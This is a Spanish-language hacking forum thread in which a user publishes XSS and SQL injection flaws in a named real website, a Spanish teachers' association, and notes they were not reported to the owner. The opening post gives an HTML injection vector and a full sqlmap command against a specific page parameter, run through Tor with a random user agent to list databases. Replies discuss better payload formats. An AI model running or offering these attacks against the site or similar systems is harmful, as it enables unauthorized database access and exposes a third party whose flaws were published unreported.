[SQLi , XSS] www.fepal.net

Iniciado por rreedd, Marzo 05, 2016, 09:37:52 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Marzo 05, 2016, 09:37:52 PM Ultima modificación: Marzo 06, 2016, 08:28:17 AM por EPSILON
Hola !!!
Bienvenido a mi post

RREEDD

Sitio :No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Descripción del sitio:  Federación Española de Asociación de Profesores de Audición y Lenguaje.

Lista de Vulnerabilidades.

  • [XSS] Inyección en URL .
       
        Url del sitio :No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
        Vector : <h1>underc0de</h1>
        xploit : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta<h1>underc0de</h1>&pg=1
        Reportado: NO
        Autor: RREEDD


  • [SQLi] Inyección en URL.
       
        Url del sitio :No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
        Inyeccion :  No tienes permitido ver enlaces. Registrate o Entra a tu cuenta -u "www.fepal.net/noticias.php?id=1&pg=1" -p "id"  --tor --tor-type=SOCKS5 --check-tor --random-agent --dbs --time-sec 15
        Herramienta : SQLMAP
        Reportado: NO
        Autor: RREEDD
Saludos desde Chile
Marzo 06, 2016, 08:50:58 AM #1
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.
Marzo 06, 2016, 10:35:16 AM #2
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.

Además de eso, cuando buscas una XSS tienes que buscar ejecutar código javascript, en muchas ocasiones te permite poner una etiqueta html, pero no se puede llegar a ejecutar un código javascript.

Éste Payload estaría mejor: "No tienes permitido ver enlaces. Registrate o Entra a tu cuenta"
RollthBuen hacker mejor No tienes permitido ver enlaces. Registrate o Entra a tu cuenta/No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Marzo 06, 2016, 12:05:45 PM #3
RREEDD
Hola!!
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.
Gracias por la aclaración, porque mi intención al poner el payload de sqlmap era demostrar que era vulnerable, así que lo tendre en mente para la próxima.

Muchas gracias a todos por comentar.

Saludos desde Chile.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario